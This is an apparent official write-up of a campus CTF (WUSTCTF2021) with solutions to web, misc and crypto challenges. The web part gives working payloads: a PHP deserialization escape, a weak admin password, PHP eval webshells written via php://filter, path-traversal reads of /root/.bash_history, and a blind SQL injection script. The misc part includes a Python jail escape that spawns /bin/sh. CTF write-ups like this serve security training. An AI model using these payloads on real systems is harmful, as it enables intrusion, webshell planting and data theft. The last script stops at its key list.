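WUSTCTF2021 Official Write-up

Last updated: 1 year ago

Preface

This competition had no AWD round, only an on-site jeopardy-style round. It was held on campus, ran for 8 hours, and was open only to students of our university!

Main Text

Web

Treasure Hunt (寻宝)

Following the hint, visit robots.txt. Then visit the blog it points to; the hint old!old!old! suggests the clue is time-related, so search from the end backwards. The clue is in the last (earliest published) blog post, old_blog. Following the new clue, visit /get_final_treasure.php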

<?php
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
include "flag_3.php"; // "The final treasure is in $flag in flag_3.php. Can you find it?";
$hello = "world";
$world = "hello";
if ( !isset($_POST["flag"]) )
    die($hello);
foreach ($_GET as $key => $value)
    $$key = $$value;
foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($hello);
echo "give_you_flag!: ". $flag . "\n";
die($world);
?>

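A simple variable-variables challenge. I used $world, because the echo "give_you_flag!: ". $flag . "\n"; line provided by the challenge cannot be used: the POST loop has already overwritten $flag with the submitted value by the time it runs. payload: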

GET:world=flag
POST:flag=1

$world takes the value of $flag before $flag is changed, so it is not affected. Concatenate the three flag parts and submit.

Ezserialize

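A string-length deserialization escape. Either the shrinking or the growing variant works; I chose the character-growing variant (the character-shrinking variant is the simplest). The number of characters to account for is 79. Below is the URL-encoded string to be escaped: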

%22%3Bs%3A10%3A%22%00%2A%00vertify%22%3BO%3A5%3A%22admin%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00flag%22%3Bs%3A20%3A%22flag%7BThis_fake_flag%7D%22%3B%7D%7D

Use flag and union to complete the escape; the former counts for 2 and the latter for 1:

1
2
3
4
5
6
POST:
username=aaa&password=aflagflagflagflagflagflagflagflagflagflagflagflagflagflagf
lagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagf
lagflagflagflagflagunion%22%3Bs%3A10%3A%22%00%2A%00vertify%22%3BO%3A5%3A%22admin
%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00flag%22%3Bs%3A20%3A%22flag%7BThis_fake_flag%7D%
22%3B%7D%7D

Send the request to get the flag.
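Why the 2 and 1 counts have to add up to exactly 79, as an added example (a Python model of PHP's serialize() format, not the challenge source, which this write-up does not show): filtering the serialized text after serialize() lengthens the data but leaves the s:N prefixes untouched, while filtering the values first keeps them consistent. The class layout, the replacement word "hacker", the boolean vertify value and the sample input are assumptions made for the illustration.

```python
# Added illustration; a model of the serialize() text format only.
# Assumed filter: both words become a six-character word (+2 and +1 characters).
FILTER = {"flag": "hacker", "union": "hacker"}


def php_str(s):
    """PHP string token: s:<length>:"<data>";"""
    return 's:%d:"%s";' % (len(s), s)


def serialize_user(username, password):
    """Serialized form of the assumed object; protected vertify starts as false."""
    body = (php_str("username") + php_str(username)
            + php_str("password") + php_str(password)
            + php_str("\x00*\x00vertify") + "b:0;")
    return 'O:4:"user":3:{' + body + "}"


def word_filter(text):
    for word, replacement in FILTER.items():
        text = text.replace(word, replacement)
    return text


def growth(text):
    """How many characters the filter adds to `text`."""
    return len(word_filter(text)) - len(text)


def parse(data, pos=0):
    """Reader for the subset used here: strings, booleans, objects.
    Returns (value, next_position)."""
    tag = data[pos]
    if tag == "b":
        end = data.index(";", pos)
        return data[pos + 2:end] == "1", end + 1
    if tag == "s":
        colon = data.index(":", pos + 2)
        n = int(data[pos + 2:colon])
        start = colon + 2                      # skip :"
        if data[start + n:start + n + 2] != '";':
            raise ValueError("length prefix does not match data at %d" % pos)
        return data[start:start + n], start + n + 2
    if tag == "O":
        colon = data.index(":", pos + 2)
        n = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + n]
        pos = colon + 2 + n + 2                # skip ":
        colon = data.index(":", pos)
        count = int(data[pos:colon])
        pos = colon + 2                        # skip :{
        props = {}
        for _ in range(count):
            key, pos = parse(data, pos)
            props[key], pos = parse(data, pos)
        if data[pos] != "}":
            raise ValueError("object not closed at %d" % pos)
        return (name, props), pos + 1          # anything after } is never read
    raise ValueError("unsupported token %r at %d" % (tag, pos))


def load_unsafe(username, password):
    """Vulnerable order: serialize, then filter the serialized text."""
    return parse(word_filter(serialize_user(username, password)))[0]


def load_safe(username, password):
    """Fixed order: filter the values, then serialize, so each length
    prefix is computed from the bytes that are actually stored."""
    return parse(serialize_user(word_filter(username), word_filter(password)))[0]


# Constructed input: a 25-character tail that closes the password string and
# supplies its own vertify property, preceded by filler that grows by 25.
TAIL = '";s:10:"\x00*\x00vertify";b:1;}'
SAMPLE_PASSWORD = "flag" * 12 + "union" + TAIL

if __name__ == "__main__":
    print("growth of the write-up's filler:", growth("flag" * 39 + "union"))
    print("unsafe order:", load_unsafe("aaa", SAMPLE_PASSWORD)[1])
    print("safe order:  ", load_safe("aaa", SAMPLE_PASSWORD)[1])
```

In the unsafe order even a harmless password containing one of the filtered words no longer parses, which is a useful symptom to look for when reviewing code that rewrites serialized data.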

hacker’s gift

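I used one hint on this challenge, and I have to say that reading the hint made me want to beat up the challenge author: "find the backend and try weak passwords"... Visiting /admin redirects automatically to the backend login page. I brute-forced it by hand and, after long and painful testing, found the weak password. (God knows what I went through; luckily weak passwords like admin666 had tormented me before.) payload: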

username=admin
password=admin888

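Enter the backend. Going by the challenge name, there is a gift. The approach here was to getshell by backing up the database file. That did not work because the x13 plugin was not enabled, and I nearly spent 100 yuan on impulse to buy the plugin for the server. The site-security section of the backend has a trojan-detection feature; running a scan turns up the backdoor file media/door.php. The file's contents are obfuscated so lightly that it barely counts; following it through step by step and piecing the final code together gives roughly <?php @eval($_POST['wen']);?>

Connect to the webshell and retrieve the flag from the root directory.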

Writeshell

The challenge source code is:

<?php
highlight_file(__FILE__);
$filename=$_POST['filename'];
$res=["hacker"=>$_GET['cmd']];
$code = '<?php return [';
foreach ($res as $key => $value)
{
    $code .= '\'' . $key . '\'' . '=>' . '\'' . $value . '\'' . ',';
}
$code .= ']; ';
file_put_contents($filename,$code);
?>

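The point being tested is clear: the use of php://filter. The problem is that what we write into the file ends up as the content after return, so arbitrary code execution is not possible. We need a way to break out of it. This is equivalent to bypassing a "death function". Using write=convert.base64-decode alone fails because of the = characters, so in the end I used write=string.strip_tags|convert.base64-decode, and the parameter also has to close off the return. payload: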

GET:
cmd=];?>PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz5h //<?php @eval($_POST['cmd']);?>a
POST:
filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=a.php

Connect to a.php with AntSword and find the flag in the root directory.

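Footprints (足迹)

Following the challenge hint, search for historical vulnerabilities in Chanzhi (禅知) 1.6. There is an unauthenticated arbitrary file read in the front end; a request like the following reads arbitrary files: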

http://127.0.0.1/file.php?pathname=../index.php&t=txt&o=source

Look at the hint on the home page:

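<h2>That damned hacker wrecked the environment like this just to get the flag.</h2>
<h2>This hacker got into the server as root and took the flag</h2>
<h2>Oh right, I hear this version is Chanzhi 1.6</h2>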

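Combined with the challenge name "Footprints", the guess is that a log-type file needs to be read.

I did not solve this during the competition. Afterwards the challenge author said to look at the file that records the commands that were executed, and only then did the direction become clear. During the competition I had been reading all kinds of logs looking for traces, but they were either irrelevant or had mostly been deleted by the author (only the shell command history file was left). So the file to read is the root user's shell history file: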

http://127.0.0.1/file.php?pathname=../../../../../../../../../root/.bash_history&t=txt&o=source

The history contains this:

#1630747485
find / -name flag
#1630747488
clear
#1630747490
cd /
#1630747491
ls
#1630747495
cat flllllllllllllllll1ag

So the following payload reads the flag:

http://127.0.0.1/file.php?pathname=../../../../../../../../../flllllllllllllllll1ag&t=txt&o=source
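The history excerpt above uses bash's timestamped format, where each command is preceded by a #<epoch> line. As an added example (not part of the original write-up), this parser turns such a file into a UTC timeline and resolves which absolute paths were read, which is the same inference made by hand above. The list of file-reading commands and the handling of cd are simplifying assumptions.

```python
import posixpath
from datetime import datetime, timezone

# The excerpt quoted in the write-up, embedded so the example runs offline.
HISTORY_EXCERPT = """\
#1630747485
find / -name flag
#1630747488
clear
#1630747490
cd /
#1630747491
ls
#1630747495
cat flllllllllllllllll1ag
"""

# Assumption: a small set of commands treated as "reads a file".
READERS = {"cat", "less", "more", "head", "tail"}


def parse_history(text):
    """Pair every command with the '#<epoch>' line written before it.
    Commands with no preceding stamp (older entries, continuation lines)
    get time None. A literal comment made only of digits is ambiguous in
    this format and is treated as a stamp."""
    entries = []
    stamp = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#") and line[1:].isdigit():
            stamp = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
            continue
        entries.append({"time": stamp, "command": line})
        stamp = None
    return entries


def timeline(entries):
    """Rows of (ISO-8601 UTC time, seconds since previous stamped command,
    command); the first two fields are None when unknown."""
    rows = []
    previous = None
    for entry in entries:
        when = entry["time"]
        gap = None
        if when is not None and previous is not None:
            gap = int((when - previous).total_seconds())
        if when is not None:
            previous = when
        rows.append((when.isoformat() if when else None, gap, entry["command"]))
    return rows


def resolved_reads(entries, start_dir="~"):
    """Follow plain 'cd <path>' commands and return the normalised paths
    handed to file-reading commands. '~' stands for the unknown login
    directory; 'cd -' and shell expansions are not modelled."""
    cwd = start_dir
    reads = []
    for entry in entries:
        parts = entry["command"].split()
        if not parts:
            continue
        if parts[0] == "cd":
            target = parts[1] if len(parts) > 1 else start_dir
            cwd = posixpath.normpath(posixpath.join(cwd, target))
        elif parts[0] in READERS:
            for arg in parts[1:]:
                if not arg.startswith("-"):
                    reads.append(posixpath.normpath(posixpath.join(cwd, arg)))
    return reads


if __name__ == "__main__":
    parsed = parse_history(HISTORY_EXCERPT)
    for when, gap, command in timeline(parsed):
        print(when, gap, command)
    print("files read:", resolved_reads(parsed))
```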

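WUST Face Score Query 2.0 (WUST颜值查询2.0)

The filter blocks ", ', the comma, =, space, if, like, regexp, --+, sleep, benchmark and join. The injectable statement is odd and I do not really understand how the backend works (I can't do development T^T); I will have to "have a chat" with the challenge author afterwards. Start by testing the type: id=1 gives no error while letters give an error, so it is numeric. I happened to test id=database() and found that the welcome message was echoed (later on it turns out that the welcome message appears for id=0, 4 and 5), which means this is a blind injection.

As far as I know, time-based blind injection cannot be used here, so consider boolean-based blind injection. Construct the following test statement; the page echoes the welcome message: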

(select/**/case/**/1/**/when/**/1/**/then/**/database()/**/else/**/1/**/end)

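Dump the current database name. Below is the test statement, which echoes the welcome message; the script recovers the current database name test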

(select/**/case/**/1/**/when/**/(ascii(substr(database()/**/from/**/1/**/for/**/1))>1)/**/then/**/database()/**/else/**/1/**/end)

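Dump all database names. Below is the test statement, which echoes the welcome message; the script recovers the databases information_schema, mysql, performance_schema, sys, test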

(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata))/**/from/**/1/**/for/**/1))>1)/**/then/**/database()/**/else/**/1/**/end)

Dump the table names of the test database. Below is the test statement; the script recovers ctf, flaaaaag

(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(table_name))from(information_schema.tables)/**/where/**/table_schema/**/in/**/(select/**/database()))/**/from/**/1/**/for/**/1))>1)/**/then/**/database()/**/else/**/1/**/end)

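I got stuck on dumping the column names. In the end I worked out (guessed) by manual testing the two columns of the ctf table, id and name, and one column of the flaaaaag table, id

After some thought, I found a where condition that can be used for filtering: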

where/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))>102/**/and/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))<104

It restricts the search to rows whose table_name value has an 8th character with an ASCII code between 102 and 104, which narrows the query range. The script follows:

# Simple boolean-based blind injection over a GET parameter
import requests
import time

url = "http://118.31.32.88:8095/?"
temp = {"id" : ""}
column = ""
for i in range(1,1100):
    time.sleep(0.03)
    # binary search over the printable ASCII range for character i
    low = 32
    high = 128
    mid = (low+high)//2
    while(low<high):
        # dump the current database name
        temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select/**/database())/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        # dump all database names
        #temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        # dump table names
        #temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(table_name))from(information_schema.tables)/**/where/**/table_schema/**/in/**/(select/**/database()))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        # dump column names
        #temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(column_name))from(information_schema.columns)/**/where/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))>102/**/and/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))<104)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        # dump values
        #temp["id"] = "(select/**/case/**/when/**/(ascii(substr((select/**/group_concat(f1ag)from/**/`flaaaaag`)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        r = requests.get(url,params=temp)
        #time.sleep(0.05)
        #print(low,high,mid,":")
        if "hello" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    # 32 or 127 means no further character was found
    if(mid ==32 or mid ==127):
        break
    column +=chr(mid)
    print(column)

print("All:" ,column)

Misc

signin

Zero-width character steganography + emoji-aes.

py2

__import__('os').system('/bin/sh')

ezsteg

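Open the image in stegsolve; on the red plane 0 channel I found that the G plane channel has something in it. Save the Green plane 0 image and then compare it using stegsolve's Image Combiner. This reveals the first half of the flag and a hint for the second half: QIM quantization with a step size of 20. Searching GitHub for QIM quantization turns up this URL: https://github.com/pl561/QuantizationIndexModulation/blob/master/qim.py. I rewrote a function modelled on `test_qim` there and found that msg_detected in the result is all 1s and 0s; changing all the 0s to 255 and saving it as a new image gives the second half of the flag.

Script: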

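import cv2
from tqdm import tqdm
from qim import QIM  # the QIM class from the qim.py linked above


def my_test_qim():
    delta = 20  # quantization step given in the hint
    qim = QIM(delta)
    y = cv2.imread('./ezsteg.png')
    z_detected, msg_detected = qim.detect(y)
    # scale the detected 1 bits to 255 so the bit plane is visible as an image
    for i in tqdm(range(len(msg_detected))):
        for j in range(len(msg_detected[i])):
            for k in range(len(msg_detected[i][j])):
                if msg_detected[i][j][k] == 1:
                    msg_detected[i][j][k] = 255
    cv2.imwrite('flag.png', msg_detected)


my_test_qim()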
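What the detect call does with a step size of 20, as an added pure-Python sketch of the standard QIM embed/detect pair (not the code from the linked repository and not the challenge image): each pixel is snapped to one of two interleaved lattices, and detection picks the nearer one. The 4x4 cover and bit pattern are constructed, and the step is assumed to be a multiple of 4.

```python
DELTA = 20  # quantization step size given in the challenge hint


def qim_embed(pixel, bit, delta=DELTA):
    """Snap `pixel` to the lattice that encodes `bit`.

    Bit 0 uses multiples of delta shifted by -delta/4, bit 1 by +delta/4.
    A result pushed outside 0..255 is moved one whole step back inside,
    which keeps it on the same lattice so it still decodes correctly.
    """
    offset = delta // 4
    y = round(pixel / delta) * delta + (offset if bit else -offset)
    if y < 0:
        y += delta
    elif y > 255:
        y -= delta
    return y


def qim_detect(pixel, delta=DELTA):
    """Return the bit whose lattice point lies closest to `pixel`."""
    base = round(pixel / delta) * delta
    d0 = abs(pixel - (base - delta / 4))
    d1 = abs(pixel - (base + delta / 4))
    return 0 if d0 < d1 else 1


def embed_plane(cover, bits):
    """Embed one bit per pixel of a 2-D list of 8-bit values."""
    return [[qim_embed(p, b) for p, b in zip(cover_row, bit_row)]
            for cover_row, bit_row in zip(cover, bits)]


def detect_plane(stego):
    """Recover the bit plane from a 2-D list of 8-bit values."""
    return [[qim_detect(p) for p in row] for row in stego]


def to_viewable(bits):
    """Scale a 0/1 bit plane to 0/255 so it shows up when saved as an image."""
    return [[255 if b else 0 for b in row] for row in bits]


# Constructed data: a cover with values near both ends of the 8-bit range
# and a small hidden pattern.
COVER = [
    [0, 3, 10, 57],
    [99, 128, 130, 200],
    [131, 250, 255, 254],
    [17, 64, 180, 241],
]
HIDDEN = [
    [1, 0, 0, 1],
    [0, 1, 1, 0],
    [0, 1, 1, 0],
    [1, 0, 0, 1],
]

STEGO = embed_plane(COVER, HIDDEN)
RECOVERED = detect_plane(STEGO)

if __name__ == "__main__":
    for row in to_viewable(RECOVERED):
        print(row)
```

Detection tolerates any per-pixel change smaller than a quarter of the step, which is why the hidden plane survives in an image that looks unmodified.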

babypcap

A mouse-traffic challenge; a script can be found on CSDN:

# f=open('usbdata.txt','r')
# fi=open('out.txt','w')
# while 1:
#     a=f.readline().strip()
#     if a:
#         if len(a)==8: # for mouse traffic, change len to 8
#             out=''
#             for i in range(0,len(a),2):
#                 if i+2 != len(a):
#                     out+=a[i]+a[i+1]+":"
#                 else:
#                     out+=a[i]+a[i+1]
#             fi.write(out)
#             fi.write('\n')
#     else:
#         break
# fi.close()

nums = []
keys = open('out.txt','r')
f = open('xy.txt','w')
posx = 0
posy = 0
for line in keys:
    if len(line) != 12 :
        continue
    # bytes 1 and 2 of the report are signed X and Y displacements
    x = int(line[3:5],16)
    y = int(line[6:8],16)
    if x > 127 :
        x -= 256
    if y > 127 :
        y -= 256
    posx += x
    posy += y
    btn_flag = int(line[0:2],16) # 1 for left , 2 for right , 0 for nothing
    if btn_flag == 2 : # 2 = right button here (1 would be the left button)
        f.write(str(posx))
        f.write(' ')
        f.write(str(posy))
        f.write('\n')
keys.close()
f.close()

forensic

Volatility hashdump

Crypto

checkin

Check-in challenge; here is the script:

from libnum import *
from gmpy2 import *

a = 96316700053619982349826498082259844895063380240567022005928513915204024844540469555622671378420860794984950658042831492783861955562369157151421516119461394776198481138414957948098639517961692333468639614643929505462336976740245087790881358621201910998692556309218648061409226131514631759925556900619868423867
p = 1772397479946330723163700367177958503809469527323645748555263786917749464058881768878367292985765491865073458420314282392421071235609276843150929766594813162063411528684281902561558210187499397853544676112482960429296616190152426855278860415557236374173007912427682616815228824748584477478780033886167054221 71
c = 31249810030340024867701516253216124873798373762921285160326678130373368708545564162489355490838932695325242212478465783024384459580684925642281202270189855386158713050116222890609403658664009085600847194989625233217765205670373759181021708443179634537090066546973252972859914381008999790882607671941093099299
ni = invert(a, p)
m = c * ni % p
print(n2s(int(m)))

P.S. The remaining challenges only have scripts!

base

s = 'zCN7zTIOntz8zCiPzsQQzCySltr8m9mJyCiMmsQMmPmRzwyPzdfBowzZ='
# custom base64 alphabet: lowercase, digits, uppercase, then + and /
b_char = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'
b = ''
for i in s:
    for j in range(len(b_char)):
        if i == b_char[j]:
            b += str(bin(j)).replace('0b', '').zfill(6)
flag = ''
# decode whole bytes only; leftover padding bits at the end are ignored
for i in range(0, len(b) - len(b) % 8, 8):
    flag += chr(int(b[i: i+8], 2))
print(flag)

random1

# py2
import random
import gmpy2
from libnum import *

n = 144573683990296079611135474661197492569962285163118264304760128514378450625043070474838075626723354220121948920313400664358341070757676498630899262349227958025807395866103391135742530910291132519036950667849498017553807524999532071920009738654477379676790400942232810106883328105428161410721145229679023998881
c = 140936410048438311250552166359315531524717850408136878422422753861467709727494132943441793325459384490656351395836085596063714127829696538515364822908513326788824368390411397265861249839989684310498194231709180660320399728106109349119244510966442534818280589033645304725341767217060885195904689618851168472021
res = [
224, 32, 63, 37, 139, 9, 37, 205, 108, 41, 237, 68, 40, 206,
48, 112, 239,
85, 232, 0, 168, 105, 214, 13, 185, 107, 27, 176, 219, 55,
128, 25, 80,
249, 88, 86, 32, 6, 110, 20, 171, 220, 249, 251, 26, 52, 149,
234, 60, 145,
126, 25, 207, 5, 42, 0, 199, 155, 56, 142, 199, 37, 4, 76,
173, 138, 195,
112, 145, 123, 175, 178, 123, 73, 32, 223, 200, 254, 135, 94,
156, 97, 67,
252, 31, 179, 245, 231, 90, 60, 77, 63, 167, 33, 136, 40, 210,
219, 226,
164, 164, 45, 122, 85, 29, 59, 86, 123, 251, 126, 37, 9, 119,
45, 142, 187,
7, 57, 84, 169, 82, 192, 244, 191, 62, 62, 37, 25, 160, 141,
248, 147, 128,
236, 123, 64, 177, 110, 50, 39, 143, 73, 172, 35, 4, 15, 180,
101, 78, 46,
164, 35, 242, 70
]
seeds = [
9999, 1247, 5097, 7717, 7026, 8398, 961, 3156, 1271, 7473,
3669, 6716,
7550, 1426, 8065, 351, 738, 4057, 877, 4029, 7606, 1822, 7749,
7973, 9666,
5927, 7944, 1240, 8960, 443, 6349, 5949, 5913, 2332, 7255,
5185, 5504,
3499, 8855, 4183, 8812, 5865, 4147, 5091, 4556, 1968, 5589,
2481, 3411,
514, 589, 8078, 9590, 1765, 1009, 4415, 6603, 3978, 9215,
5307, 3804, 1141,
6691, 1760, 101, 7008, 6165, 9974, 1194, 3665, 7579, 1148,
5786, 6175,
1333, 7932, 8217, 9058, 5400, 6527, 6220, 1111, 4265, 208,
2191, 9706,
1019, 7249, 7644, 907, 5679, 3335, 3181, 5301, 4977, 2455,
724, 4447, 3566,
9161, 1289, 181, 3509, 6305, 8183, 4024, 2630, 131, 1822,
8918, 5595, 6849,
2555, 4221, 3023, 5828, 5622, 5812, 2378, 746, 3608, 822,
4856, 6987, 9977,
5289, 342, 5418, 9974, 5291, 6895, 9663, 3642, 2965, 8003,
5830, 6373,
3394, 8308, 6754, 4843, 2100, 1355, 5166, 601, 9987, 8921,
7563, 2250,
9056, 2873, 7479, 5508, 109
]
dp = ''
for i in range(len(seeds)):
    random.seed(seeds[i])
    rands = []
    for j in range(4):
        rands.append(random.randint(0, 255))
    dp += chr(rands[i % 4] ^ res[i])
dp = int(dp)
e = 0x10001

for i in range(1, e):
    if (dp * e - 1) % i == 0:
        if n % (((dp * e - 1) // i) + 1) == 0:
            p = ((dp * e - 1) // i) + 1
            q = n // p
            phi = (q - 1) * (p - 1)
            d = gmpy2.invert(e, phi)
            m = pow(c, d, n)
            print(n2s(m))

random2

from Crypto.Util.number import *
from Crypto.Cipher import AES
from mt19937predictor import MT19937Predictor

keys = [74737492451949886796883447380,
51358027370976380985099489502,
412762483065178295255791439485932171376749700084, 910689806,
1149695904, 3104053370, 221975799, 3823412020, 958468189,
3586356097, 340817801, 2878068849, 2732757663, 2018092082,
1847897227, 1759748212, 1295396426, 2794984001, 4265922173,
3532941962, 3649453440, 1086966694, 2188196779, 1036830362,
3114332204, 2720067903, 3763019658, 4220680032, 1434665040,
2867449357, 327630472, 4028025891, 1107232876, 1341894502,
3410775936, 792029308, 2140406850, 618481849, 3329607978,
1024829298, 1620771375, 1042727260, 1141119170, 2850063412,
722634918, 109575186, 1993029882, 2096912385, 866181039,
827908342, 1718528485, 1617437693, 3893036959, 2846991704,
3366375532, 2763086122, 2690998389, 1148589641, 1571939581,
2933947318, 4121295833, 3030689848, 1790011374, 109272014,
121093659, 4007439172, 831512040, 978840109, 3000990210,
3025633350, 1335144143, 4107810622, 1035611013, 3925921218,
1398042454, 1123546694, 4161792772, 1177640646, 4066189210,
2240592239, 508327944, 839225012, 1605466793, 2875695963,
626270177, 1371375933, 11364760, 3470778132, 1706915094,
1458410373, 98854289, 1392252258, 1560427103, 3615589636,
147666569, 1045773025, 4263298490, 3895751869, 2691680307,
1699526232, 3685180876, 729503966, 554847696, 1562590775,
3563661002, 963617489, 3181526105, 2184215744, 2144648457,
1109270973, 3071342721, 2842429183, 668733579, 1262667392,
772190169, 1000365415, 3453506497, 412844225, 9975293, 919025159,
3317679250, 2335686357, 1608848888, 2579223536, 1816878070,
3734808856, 269077113, 2396885783, 1147867931, 2331502665,
2928315805, 908907677, 1009287219, 1017406485, 3870217028,
1835376973, 890949168, 671845795, 3380480668, 4171623559,
1662988401, 3709126631, 2520677766, 1660449390, 120494599,
907225530, 3665272463, 136171352, 1758076339, 3009587924,
2866084549, 3656368543, 1692972691, 714237605, 892521830,
1942496649, 4241764492, 930308540, 3340229942, 773043293,
3514688079, 1318180965, 1669012263, 3638042505, 3025395295,
226129302, 153479541, 2764571825, 3421587858, 334668853,
1330796170, 218556632, 972714166, 922603164, 4024647445,
4233196368, 1249046751, 3667925019, 2276336634, 3644888947,
1444996806, 413210699, 2208048223, 3813568258, 2345486173,
487998086, 477969329, 3409170127, 3568976035, 3460493127,
2697206478, 1262489351, 4011219190, 1419296521, 1307871567,
270455245, 4245043905, 687578193, 1070246561, 185531160,
2626503659, 3372671141, 3673238883, 2542194104, 4260369384,
67076509, 4164858072, 3344428349, 2674528215, 2352981085,
4188340133, 2490407345, 2277623345, 578009254, 589898778,
2257425250, 4264855682, 3217088425, 1918678675, 2409396248,
366216060, 2318262020, 2695905062, 1588352782, 1427064824,
470125313, 3305196643, 1839661592, 2584820258, 299694866,
4205679150, 3105720803, 2804340888, 3893613342, 733876896,
232917987, 2727309654, 1790439074, 1927738154, 4017472905,
1863059250, 655457188, 3759472447, 4183317773, 797877611,
2699417810, 803278050, 3877877653, 1586583099, 3875432289,
111221042, 233407522, 3347300855, 3873882496, 3741842610,
717425034, 2557158550, 876205693, 683472955, 3676324193,
758448123, 1995439610, 2943722151, 1610689376, 4230997558,
802060680, 2861576590, 960427169, 2361123516, 2886027757,
271492995, 3597341957, 1973308613, 687254699, 2103809719,
1260885931, 2906748062, 873332944, 3671891228, 2490863425,
274650518, 990260178, 989305697, 3765783495, 3579353903,
1372910559, 165320956, 896735304, 3564054930, 2374613969,
786938917, 3955168292, 2134822172, 1403480802, 1340392765,
3154014116, 1793814283, 1981841272, 1873394217, 4217089972,
3403224767, 111486932, 1370301502, 1137722044, 1454768737,
2817161685, 1373532601, 88198402, 1162901466, 1764878443,
3204368881, 764246346, 3192119660, 876165427, 4104033361,
2154934077, 1561430573, 826991304, 849458135, 4188058136,
1199351023, 2127952015, 2094038064, 300699273, 3378157804,
6679715, 559293910, 3028818176, 2490265745, 3646800433,
1746603729, 1531309519, 18564847, 3452425344, 1989426082,
2251367880, 1426356258, 2425736463, 1600248295, 955344576,
3502485031, 1323390407, 399691485, 1835777771, 1828335677,
3348082301, 3687268482, 2457400649, 3368374393, 1119303358,
1270433121, 3059691677, 2392910075, 591224638, 1311675618,
4122050325, 4014348903, 2095907405, 1519824911, 2825776887,
3354142321, 1098235797, 1481266867, 1051367302, 1263016096,
1336057651, 1683842359, 4054448354, 1491994207, 1160110019,
3222808831, 177510926, 423347477, 803602771, 2683641253,
2919035439, 2485161789, 3378544338, 1610409532, 1545641821,
546762619, 2395983270, 3838745031, 789177414, 2123719243,
3476088109, 1615713790, 1335041829, 4006963851, 1700197865,
73798124, 1251950799, 2448692292, 937465221, 2191277155,
2283183462, 3235943428, 1888733145, 1637420644, 2906472352,
538528848, 1787881095, 2527345959, 816324140, 780626095,
3958671235, 1060151404, 3939612973, 720163439, 3130037256,
868218434, 594717218, 2378649142, 630567292, 272416131,
2656750985, 2254309115, 398769631, 144191385, 3584257427,
2276368553, 4037163602, 2651140730, 2231274829, 1953622167,
4083152642, 3006733661, 929392152, 843949652, 2714951407,
810363743, 1283798592, 3121903325, 1988057118, 356119324,
1904222878, 4044843055, 112669104, 868692487, 1115920155,
1623439582, 488326378, 148287535, 3338996246, 2166938666,
3797453833, 1474427255, 1386753952, 3317126798, 2190807666,
4259624962, 3066765455, 2382942891, 4046402452, 3243966738,
1774858251, 3181254579, 2171453049, 905778132, 1409024919,
4082347550, 1308497825, 3944454243, 1681570359, 3622008213,
1130389974, 3937594426, 4193387111, 4156444245, 1665819644,
4099931325, 546382740, 3459524364, 3215392046, 628790677,
2460115724, 4154656625, 1738275004, 372632247, 3901053671,
1968302733, 1542557146, 954360221, 94489421, 2526265974,
3493620125, 227040704, 1966827767, 2710288704, 1777503765,
3060587047, 2922448684, 1818271608, 3774695159, 198891092,
1892315134, 1988189925, 1877360903, 176031450, 782372078,
2630033970, 222585085, 1784220674, 187019927, 3793161227,
275394451, 3620112924, 1046758031, 794695465, 4020417715,
1036350909, 1034143101, 130770292, 3376762604, 3099991375,
1317943524, 538393453, 1676278328, 3728445031, 2444153711,
1294577644, 3255702608, 382221508, 501348604, 1545416914,
4046130944, 1518955393, 3919525514, 1729967634, 2572204860,
3777225961, 1646036822, 475018472, 2247517569, 4257731164,
1111295866, 524303023, 3981652986, 4072216404, 3747688429,
1885894640, 833446526, 3955045968, 1703975805, 1141801012,
2437322873, 2732846667, 1371506834, 669098384, 1963802511,
1542039, 728580454, 4041454310, 1019581040, 3144560205,
1329189307, 1043039655, 1028345076, 3541168610, 2082983922,
1305525731, 1078333930, 556043109, 3570861415, 1623319076,
3514585273, 223719132, 4031808254, 2549094947, 3825858427,
3214724358, 1835103180, 2471774591, 2111554082, 2948121215,
1362405065, 3765638194, 491471279, 2479158340, 3749279021,
3306251008, 2577577664, 1245538106, 503105027, 139202844,
2287890849, 3563168099, 1467460138, 3922094655, 1903765924,
3858903218, 3343562703, 2145132444, 1134537221, 2942539446,
914603375, 2155053085, 2864704965, 1971547127, 1892432263,
2604528206, 3387176542, 361652931, 2305859318, 1345198505,
2416327840, 887059258, 3219763770, 316636299, 307065443,
431437125, 4279494318, 220513368, 2362459616, 3712600310,
2105434588, 2938672182, 3316109731, 850677909, 1593089633,
1448569654, 2885245137, 3269946753, 885150079, 2358168430,
1785698607, 1757002566, 197277094, 47259139, 2710959991,
710476854, 1929434500, 1732169408, 381305673, 2982171232,
486112880, 3651033563, 734915423, 27291312, 93262695, 3206874794,
1595912125, 643556702, 2929755197, 1043917347, 3181953869,
3059173850, 986850461, 947059764]
